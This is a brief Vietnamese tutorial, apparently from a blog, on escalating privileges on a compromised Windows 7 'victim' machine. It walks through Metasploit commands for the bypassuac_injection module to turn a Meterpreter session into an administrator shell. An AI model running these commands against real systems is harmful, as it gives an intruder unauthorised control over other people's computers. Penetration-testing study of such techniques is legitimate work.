Chào các bạn
Thông thường khi thâm nhập vào một hệ thống (Từ Windows 7 trở lên) bạn chỉ có quyền là 1 user
Nhưng, một số tác vụ đặc biệt yêu cầu quyền Administrator vì vậy các bạn phải thực hiện kĩ thuật leo thang đặc quyền
Đầu tiên các bạn phải tấn công được vào máy victim và có được meterpreter session.
Các bạn có thể kiểm tra quyền của các bạn bằng cách gõ lệnh meterpreter: getsystem. Nếu báo lỗi thì buộc lòng các bạn phải thực hiện kĩ thuật Privilege Escalation
Ở đây tôi dùng msfvenom và Armitage để tấn công
Trong ví dụ này tôi đã tấn công vào 1 máy chạy Windows 7 và đã có phiên meterpreter. Giờ tôi sẽ gõ getsystem để check quyền
Armitage đã báo lỗi, do đó chúng ta buộc lòng thực hiện kĩ thuật Privilege Escalation
Ở trong Armitage các bạn chuyển sang tab Console còn ở Metasploit FrameWork các bạn gõ lệnh Background và nhập các lệnh sau
use exploit/windows/local/bypassuac_injection
set SESSIONS (Nhập mã phiên Meterpreter của bạn, thường là nếu bạn chỉ tấn công một máy thì gõ set SESSIONS 1)
set TARGETS 0 với máy Victim là Windows 32bit
hoặc
set TARGETS 1 với máy Victim là Windows 64bit
run (Thực thi Module)
Một phiên Meterpreter thứ 2 được mở ra (meterpreter session 2 opened) giờ chúng ta gõ lệnh shell để mở CMD của victim xem sao
Vâng, chúng ta đã có CMD quyền Admin. Chúc các bạn thành công
DEMO
https://www.youtube.com/watch?v=TcEGAe2WigY
Visits: 1742
